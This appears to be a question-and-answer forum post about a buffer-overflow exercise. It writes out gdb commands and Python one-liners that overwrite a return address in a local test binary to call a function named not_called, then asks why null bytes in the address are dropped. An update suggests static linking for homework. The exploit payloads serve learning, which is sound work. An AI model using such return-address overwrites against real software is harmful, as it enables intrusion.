I am using buffer overflow to overwrite the return address and calls another function. The name of function I call by overwriting the return address is not_called. Here is how I create the payload
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')
The program works in the above case and not_called function is called. The problem arises when address of not_called is in this format : 0x57d.
When I create payload as follows :
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
I get the following error and program won't work.
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
/bin/bash: warning: command substitution: ignored null byte in input
0xffffd07c
Program received signal SIGSEGV, Segmentation fault.
0x5600057d in ?? ()
I have two questions:
- Is
bashwarning ignoring the bytes 0,0 and not passing them? - Second, IF you look at address at SIGSEV, it is
0x5600057d, it should have been0x0000057d.
How can I create such an address ?
Update :
A little hack if someone just wants to experiment or do homework, do static linking (gcc -static) with stdlib.h string.h stdio.h . It will increase your program size. When you disassembe it, it's address will be large enough. There is no general solution to the problem. You can see this post at Security Stackexchange
gets. I know I can store it in a file and use pipe. But what do I do insidegdb?r < filenameorr < <(python -c ...)